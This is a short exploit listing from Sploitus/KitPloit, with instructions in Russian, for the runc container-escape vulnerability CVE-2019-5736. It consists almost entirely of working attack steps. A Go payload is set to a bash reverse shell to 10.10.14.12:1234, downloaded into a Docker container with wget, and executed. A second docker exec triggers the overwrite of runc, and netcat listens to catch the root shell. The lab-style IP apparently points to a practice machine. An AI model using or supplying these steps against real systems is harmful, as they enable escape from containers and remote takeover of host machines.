## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-H3X0V3RL0RD-CVE-2019-5736
🖥️ -h3x0v3rl0rd- #️⃣ CVE-2019-5736
## Использование :
машина уязвима к CVE-2019-5736, следуйте шагам эксплойта Runc (CVE-2019-5736). Загрузите файл main.go, измените полезную нагрузку в файле на:
root@kitploit:~
var payload = "#!/bin/bash \n bash -i >& /dev/tcp/10.10.14.12/1234 0>&1"
После этого выполните:
root@kitploit:~
go build main.go
Разместите HTTP-сервер:
root@kitploit:~
python3 -m http.server

Затем откройте 3 терминала, как показано ниже:

root@kitploit:~
Терминал 1
sudo /usr/bin/docker exec -it webapp-dev01 /bin/bash
wget http://10.10.14.12/main
chmod +x main
./main
Терминал 2
sudo /usr/bin/docker exec -it webapp-dev01 /bin/sh
Терминал 3
nc -nlvp 1234
как только вы запустите ./main в первом SSH-терминале, сразу же выполните вторую команду во втором SSH-терминале, после чего вы получите обратный shell netcat в третьем терминале
